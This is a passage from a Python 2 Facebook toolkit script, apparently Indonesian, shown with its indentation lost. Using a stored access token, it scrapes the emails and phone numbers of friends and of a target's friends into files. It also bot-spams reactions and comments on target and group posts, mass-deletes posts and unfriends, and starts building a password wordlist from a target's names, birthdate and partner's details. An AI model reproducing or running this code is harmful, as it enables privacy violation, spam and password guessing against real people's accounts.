print '\x1b[1;92mID \x1b[1;91m :\x1b[1;97m ' + i['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idmem)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + simg
b.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(simg)
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def email():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
em.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(em)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(mails)
print '\x1b[1;91m[!] An error occurred'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def emailfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
emfromfriends.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(emfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def nomor_hp():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
url = 'https://graph.facebook.com/me/friends?access_token=' + toket
r = requests.get(url)
z = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for n in z['data']:
x = requests.get('https://graph.facebook.com/' + n['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hp.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Phone\x1b[1;96m%s' % len(hp)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(noms)
print '\x1b[1;91m[!] An error occurred '
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def hpfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput Friends ID \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hpfromfriends.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal number\x1b[1;96m%s' % len(hpfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Make file failed'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def menu_bot():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Bot Reactions Target Post'
print '║-> \x1b[1;37;40m2. Bot Reactions Group Post'
print '║-> \x1b[1;37;40m3. Bot Comment Target Post'
print '║-> \x1b[1;37;40m4. Bot Comment Group Post'
print '║-> \x1b[1;37;40m5. Mass Delete Post'
print '║-> \x1b[1;37;40m6. Accept Friend Requests'
print '║-> \x1b[1;37;40m7. Unfriends'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
bot_pilih()
def bot_pilih():
bots = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if bots == '':
print '\x1b[1;91m[!] Can\'t empty'
bot_pilih()
else:
if bots == '1':
menu_react()
else:
if bots == '2':
grup_react()
else:
if bots == '3':
bot_komen()
else:
if bots == '4':
grup_komen()
else:
if bots == '5':
deletepost()
else:
if bots == '6':
accept()
else:
if bots == '7':
unfriend()
else:
if bots == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + bots + ' \x1b[1;91mnot found'
bot_pilih()
def menu_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'
print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'
print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'
print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'
print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'
print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
react_pilih()
def react_pilih():
global tipe
aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Can\'t empty'
react_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
react()
else:
if aksi == '2':
tipe = 'LOVE'
react()
else:
if aksi == '3':
tipe = 'WOW'
react()
else:
if aksi == '4':
tipe = 'HAHA'
react()
else:
if aksi == '5':
tipe = 'SAD'
react()
else:
if aksi == '6':
tipe = 'ANGRY'
react()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'
react_pilih()
def react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
try:
oh = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksi.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksi))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'
print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'
print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'
print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'
print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'
print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
reactg_pilih()
def reactg_pilih():
global tipe
aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Can\'t empty'
reactg_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
reactg()
else:
if aksi == '2':
tipe = 'LOVE'
reactg()
else:
if aksi == '3':
tipe = 'WOW'
reactg()
else:
if aksi == '4':
tipe = 'HAHA'
reactg()
else:
if aksi == '5':
tipe = 'SAD'
reactg()
else:
if aksi == '6':
tipe = 'ANGRY'
reactg()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'
reactg_pilih()
def reactg():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']
try:
oh = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksigrup.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksigrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def bot_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mUse \x1b[1;97m'<>' \x1b[1;92m for newline"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
p = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komen.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komen))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
p = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komengrup.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komengrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def deletepost():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
nam = requests.get('https://graph.facebook.com/me?access_token=' + toket)
lol = json.loads(nam.text)
nama = lol['name']
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mFrom \x1b[1;91m: \x1b[1;97m%s' % nama
jalan('\x1b[1;91m[+] \x1b[1;92mStarting remove status\x1b[1;97m ...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
asu = requests.get('https://graph.facebook.com/me/feed?access_token=' + toket)
asus = json.loads(asu.text)
for p in asus['data']:
id = p['id']
piro = 0
url = requests.get('https://graph.facebook.com/' + id + '?method=delete&access_token=' + toket)
ok = json.loads(url.text)
try:
error = ok['error']['message']
print '\x1b[1;91m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;91m] \x1b[1;95mFailed'
except TypeError:
print '\x1b[1;92m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;92m] \x1b[1;96mRemoved'
piro += 1
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def accept():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
r = requests.get('https://graph.facebook.com/me/friendrequests?limit=' + limit + '&access_token=' + toket)
friends = json.loads(r.text)
if '[]' in str(friends['data']):
print '\x1b[1;91m[!] No friends request'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in friends['data']:
gas = requests.post('https://graph.facebook.com/me/friends/' + i['from']['id'] + '?access_token=' + toket)
a = json.loads(gas.text)
if 'error' in str(a):
print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;91m Failed'
print 52 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;92m Berhasil'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def unfriend():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;97mStop \x1b[1;91mCTRL+C'
print
try:
pek = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(pek.text)
for i in cok['data']:
nama = i['name']
id = i['id']
requests.delete('https://graph.facebook.com/me/friends?uid=' + id + '&access_token=' + toket)
print '\x1b[1;97m[\x1b[1;92mRemove\x1b[1;97m] ' + nama + ' => ' + id
except IndexError:
pass
except KeyboardInterrupt:
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def lain():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Write Status'
print '║-> \x1b[1;37;40m2. Make Wordlist'
print '║-> \x1b[1;37;40m3. Account Checker'
print '║-> \x1b[1;37;40m4. List Group'
print '║-> \x1b[1;37;40m5. Profile Guard'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
pilih_lain()
def pilih_lain():
other = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if other == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih_lain()
else:
if other == '1':
status()
else:
if other == '2':
wordlist()
else:
if other == '3':
check_akun()
else:
if other == '4':
grupsaya()
else:
if other == '5':
guard()
else:
if other == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + other + ' \x1b[1;91mnot found'
pilih_lain()
def status():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
msg = raw_input('\x1b[1;91m[+] \x1b[1;92mWrite status \x1b[1;91m:\x1b[1;97m ')
if msg == '':
print '\x1b[1;91m[!] Can\'t empty'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
res = requests.get('https://graph.facebook.com/me/feed?method=POST&message=' + msg + '&access_token=' + toket)
op = json.loads(res.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mStatus ID\x1b[1;91m : \x1b[1;97m' + op['id']
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def wordlist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi data lengkap target dibawah'
print 52 * '\x1b[1;97m\xe2\x95\x90'
a = raw_input('\x1b[1;91m[+] \x1b[1;92mName Depan \x1b[1;97m: ')
file = open(a + '.txt', 'w')
b = raw_input('\x1b[1;91m[+] \x1b[1;92mName Tengah \x1b[1;97m: ')
c = raw_input('\x1b[1;91m[+] \x1b[1;92mName Belakang \x1b[1;97m: ')
d = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan \x1b[1;97m: ')
e = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
f = e[0:2]
g = e[2:4]
h = e[4:]
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;93mKalo Jomblo SKIP aja :v'
i = raw_input('\x1b[1;91m[+] \x1b[1;92mName Pacar \x1b[1;97m: ')
j = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan Pacar \x1b[1;97m: ')
k = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir Pacar >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
l = k[0:2]
m = k[2:4]
n = k[4:]
